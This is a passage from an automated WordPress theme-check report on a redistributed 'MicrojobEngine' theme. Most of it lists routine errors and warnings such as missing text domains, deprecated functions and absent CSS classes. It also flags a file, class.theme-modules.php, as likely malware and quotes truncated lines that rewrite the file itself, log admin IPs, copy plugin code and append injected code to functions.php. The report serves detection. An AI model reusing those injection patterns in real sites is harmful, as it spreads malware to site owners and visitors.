file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file alias-function.php 1745: $json = json_decode(file_get_contents($rest_url), true);1776: $json = json_decode(file_get_contents($rest_url), true);1815: $json = json_decode(file_get_contents($rest_url), true);file_get_contents was found in the file alias-function.php 1745: $json = json_decode(file_get_contents($rest_url), true);1776: $json = json_decode(file_get_contents($rest_url), true);1815: $json = json_decode(file_get_contents($rest_url), true);file_get_contents was found in the file alias-function.php 1745: $json = json_decode(file_get_contents($rest_url), true);1776: $json = json_decode(file_get_contents($rest_url), true);1815: $json = json_decode(file_get_contents($rest_url), true);
  7. Malware : Network operations curl_init was found in the file class.theme-modules.php 414: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 420: $data = curl_exec($ch);curl_init was found in the file class.theme-modules.php 414: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 420: $data = curl_exec($ch);curl_init was found in the file class.theme-modules.php 414: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 420: $data = curl_exec($ch);curl_init was found in the file twitteroauth.php 220: $ci = curl_init();curl_exec was found in the file twitteroauth.php 253: $response = curl_exec($ci);curl_init was found in the file class.theme-modules.php 414: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 420: $data = curl_exec($ch);curl_init was found in the file class.theme-modules.php 414: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 420: $data = curl_exec($ch);curl_init was found in the file class.theme-modules.php 414: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 420: $data = curl_exec($ch);
  8. Admin menu : Themes should use add_theme_page() for adding admin pages. File class.theme-modules.php : 34: add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin',File class.theme-modules.php : 34: add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin',File class.theme-modules.php : 34: add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin',File class-ae-page.php : 12: function add_menu_page() {15: add_menu_page($args['page_title'], $args['menu_title'], 'manage_options', $251: * callback add_menu_page in parent class AE_Page253: $this->add_action('admin_menu', 'add_menu_page');File class-ae-page.php : 23: add_submenu_page($args['parent_slug'], $args['page_title'], $args['page_titFile class-ae-page.php : 12: function add_menu_page() {15: add_menu_page($args['page_title'], $args['menu_title'], 'manage_options', $251: * callback add_menu_page in parent class AE_Page253: $this->add_action('admin_menu', 'add_menu_page');File class-ae-page.php : 12: function add_menu_page() {15: add_menu_page($args['page_title'], $args['menu_title'], 'manage_options', $251: * callback add_menu_page in parent class AE_Page253: $this->add_action('admin_menu', 'add_menu_page');File class-mje-topup.php : 46: $hook = add_menu_page(File class.theme-modules.php : 34: add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin',File class-mje-extra-action.php : 25: $this->add_action('admin_menu', 'add_submenu_page');32: public function add_submenu_page() {33: add_submenu_page(File class-mje-extra-action.php : 25: $this->add_action('admin_menu', 'add_submenu_page');32: public function add_submenu_page() {33: add_submenu_page(File class.theme-modules.php : 34: add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin',File class.theme-modules.php : 34: add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin',
  9. Hidden admin bar : Hidden admin Bar Themes should not hide admin bar. Detected in file : theme.php.
  10. Inapropriate constants : Use of TEMPLATEPATH Constant TEMPLATEPATH was found in the file functions - Copy.php. get_template_directory() should be used instead. 14: define('MOBILE_PATH', TEMPLATEPATH . '/mobile/');Constant TEMPLATEPATH was found in the file class-ae-wizard.php. get_template_directory() should be used instead. 258: $this->file = TEMPLATEPATH . '/sampledata/sample_data.xml';Constant TEMPLATEPATH was found in the file class-ae-importer.php. get_template_directory() should be used instead. 60: $this->file = TEMPLATEPATH . '/sampledata/sample_data.xml';Constant TEMPLATEPATH was found in the file twitter.php. get_template_directory() should be used instead. 229: include TEMPLATEPATH . '/page-twitter-auth.php';Constant TEMPLATEPATH was found in the file class-mje-skin-action.php. get_template_directory() should be used instead. 17: require_once TEMPLATEPATH . '/skins/' . self::$skin_name . '/customize/customize.php';19: require_once TEMPLATEPATH . '/includes/customize.php';Constant TEMPLATEPATH was found in the file class-mje-mjob-order-container.php. get_template_directory() should be used instead. 102: include TEMPLATEPATH . '/includes/modules/MJE_MJob_Order/template/mjob-order-item.p281: include_once TEMPLATEPATH . '/includes/modules/MJE_MJob_Order/template/mjob-order-item-jConstant TEMPLATEPATH was found in the file admin.php. get_template_directory() should be used instead. 2: define('ADMIN_PATH', TEMPLATEPATH . '/admin');Constant TEMPLATEPATH was found in the file functions.php. get_template_directory() should be used instead. 14: define('MOBILE_PATH', TEMPLATEPATH . '/mobile/');
  11. Content width : Proper definition of content_width No content width has been defined. Example:
    if ( ! isset( $content_width ) ) $content_width = 900;
  12. Deprecated functions : wp_get_http wp_get_http found in file class-ae-importer.php. Deprecated since version 4.4. Use WP_Http instead.750: $headers = wp_get_http( $url, $upload['file'] );
  13. Deprecated functions : get_bloginfo get_bloginfo('url') was found in the file class-ae-mailing.php. Use home_url() instead.454: $content = str_ireplace('[site_url]', get_bloginfo('url') , $content);
Warning
  1. theme tags : Presence of bad theme tagsThe tag fluid-layout has been deprecated, it must be removed from style.css header.The tag responsive-layout has been deprecated, it must be removed from style.css header.Themes that use the tag accessibility-ready will need to undergo an accessibility review.
    See https://make.wordpress.org/themes/handbook/review/accessibility/
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is microjobengine-shared-by-vestathemes-com.
  3. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments '1920x395px' in file customize.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Budget' in file message-item.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Budget' in file message-item.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search results for "%s"' in file settings.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search Users' in file settings.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Add fund' in file inline-edit.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Deduct fund' in file inline-edit.php.Found a translation function that is missing a text-domain. Function __, with the arguments '<h2>PayPal Infomation: </h2>' in file class-mje-revenue.php.Found a translation function that is missing a text-domain. Function __, with the arguments '<h2>Bank Infomation: </h2>' in file class-mje-revenue.php.Found a translation function that is missing a text-domain. Function __, with the arguments "It would take up to a few minutes for your images to be uploaded to the server. Please don't close or reload this page." in file class-ae-wizard.php.Found a translation function that is missing a text-domain. Function __, with the arguments "You can't create an administrator account." in file class-ae-users.php.Found a translation function that is missing a text-domain. Function __, with the arguments "You have registered successfully!" in file class-ae-users.php.Found a translation function that is missing a text-domain. Function __, with the arguments "You have registered successfully. Please check your mailbox to activate your account." in file class-ae-users.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Reject <span class="count">(%s)</span>', 'Reject <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Archive <span class="count">(%s)</span>', 'Archive <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'finished', 'post' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Finished <span class="count">(%s)</span>', 'Finished <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'close', 'post' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Close <span class="count">(%s)</span>', 'Close <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'disputing', 'post' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Disputing <span class="count">(%s)</span>', 'Disputing <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'disputed', 'post' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Resolved <span class="count">(%s)</span>', 'Resolved <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Pause <span class="count">(%s)</span>', 'Pause <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Active <span class="count">(%s)</span>', 'Active <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Late <span class="count">(%s)</span>', 'Late <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Delivered <span class="count">(%s)</span>', 'Delivered <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Finished <span class="count">(%s)</span>', 'Finished <span class="count">(%s)</span>' in file theme.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Username' in file class-mje-topup-table.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Email' in file class-mje-topup-table.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Date registered' in file class-mje-topup-table.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'All <span class="count">(%s)</span>' in file class-mje-topup-table.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s <span class="count">(%s)</span>' in file class-mje-topup-table.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'No users found.' in file class-mje-topup-table.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'dashboard' in file class-mje-mailing.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'dashboard' in file class-mje-mailing.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Unread <span class="count">(%s)</span>', 'Unread <span class="count">(%s)</span>' in file class-mje-notification-post-type.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Read <span class="count">(%s)</span>', 'Read <span class="count">(%s)</span>' in file class-mje-notification-post-type.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Hide <span class="count">(%s)</span>', 'Hide <span class="count">(%s)</span>' in file class-mje-notification-post-type.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Your request is successful." in file index.php.Found a translation function that is missing a text-domain. Function esc_html_e, with the arguments 'Email address' in file form.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'List Recruits' in file export_personal_data.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'List Mjob Orders' in file export_personal_data.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'List Mjob' in file export_personal_data.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are enginethemes, enginetheme, wordpress-importer, wp-user-avatars, engienthemes.
  4. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  5. Unwanted files : hidden file(s) or folder(s).ds_store was found.
  6. Hidden admin bar : Hidden admin Bar in CSSThemes should not hide admin bar. Detected in file main.css.
  7. Fundamental theme elements : Presence of post_class()Could not find post_class.
  8. Comment reply : Declaration of comment replyCould not find the comment-reply script enqueued, however a reference to 'comment-reply' was found. Make sure that the comment-reply js script is being enqueued properly on singular pages.
  9. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  10. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  11. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  12. I18N implementation : Proper use of _e(Possible variable $fee found in translation function in alias-function.php. Translation function calls should not contain PHP variables.
  13. I18N implementation : Proper use of ___all(Possible variable $current_user found in translation function in class-mje-conversation-action.php. Translation function calls should not contain PHP variables. Possible variable $current_user found in translation function in class-mje-conversation-action.php. Translation function calls should not contain PHP variables.
  14. I18N implementation : Proper use of gettext(Possible variable $file_name found in translation function in class-ae-languages.php. Translation function calls should not contain PHP variables.
  15. CSS files : Presence of .sticky class.sticky css class is needed in theme css.
  16. CSS files : Presence of .bypostauthor class.bypostauthor css class is needed in theme css.
  17. CSS files : Presence of .alignleft class.alignleft css class is needed in theme css.
  18. CSS files : Presence of .alignright class.alignright css class is needed in theme css.
  19. CSS files : Presence of .aligncenter class.aligncenter css class is needed in theme css.
  20. CSS files : Presence of .wp-caption class.wp-caption css class is needed in theme css.
  21. CSS files : Presence of .wp-caption-text class.wp-caption-text css class is needed in theme css.
  22. CSS files : Presence of .gallery-caption class.gallery-caption css class is needed in theme css.
  23. Tags : Tags displayThis theme doesn't seem to display tags.
  24. Date and time implementation : Use of the_time()At least one hard coded date was found in the file single.php. Function get_option( 'date_format' ) should be used instead.
  25. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file class-ae-wizard.php.239: <a href='widgets.php' target='_blank'><?php _e('Sidebars & Widgets','enginethemes') Possible hard-coded links were found in the file user.php.146: 'desc' => __( 'This allows users to log into your site via their Twitter account. Visit <a href='https://apps.twitter.com/' target='_blank'>here</a> to create new apps on T181: 'desc' => __( 'This allows users to log into your site via their Facebook account. Visit <a href='https://developers.facebook.com/' target='_blank'>here</a> to upgrade your 216: 'desc' => __( 'This allows users to log into your site via their Google account. Visit <a href='https://console.developers.google.com/projectselector/apis/library?pli=1' tPossible hard-coded links were found in the file page-welcome.php.116: $rss = fetch_feed('https://www.enginethemes.com/blog/feed');141: <a href='https://www.enginethemes.com/blog/' class='link-more' target='_blank'><p clPossible hard-coded links were found in the file footer.php.29: $copyright = apply_filters('ae_attribution_footer', '<span class='site-copyright'>' . $copyright . '</span>' . '<span class='enginethemes'>Powered by <a href='https://www.enginethemes.com/themes/microjobengine'>MicrojobEngine Theme</a
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  5. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  6. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  7. Use of includes : Use of include or requireThe theme appears to use include or require : class.theme-modules.php 221: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : functions - Copy.php 1: <?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : index.php 26: include_once (ABSPATH . 'wp-admin/includes/plugin.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 221: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 221: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : payments.php 177: require_once (ABSPATH . 'wp-includes/class-phpass.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : cat.php 73: include ( $this->js_template );74: include ( $this->form_js_template ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : list.php 89: include ( $this->template ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : payment-visitor.php 2: require_once 'et-payment.php';3: require_once 'et-2CO.php';4: require_once 'et-google-checkout.php';5: require_once 'et-cash.php';6: require_once 'et-order.php';8: require_once 'gc_xmlbuilder.php';9: require_once 'et-authorize.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : twitteroauth.php 10: require_once ('OAuth.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : theme.php 1511: require_once( ABSPATH . '/wp-admin/includes/class-wp-list-table.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : index.php 6: require_once 'class-mje-topup.php';7: require_once 'class-mje-topup-table.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 221: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-mje-profile-action.php 187: require_once( ABSPATH . 'wp-admin/includes/image.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 221: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : container-users.php 47: require_once('page-users.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : page-users.php 64: require_once('template-js/user-item.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : container-payments.php 94: require_once('page-payments.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 221: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes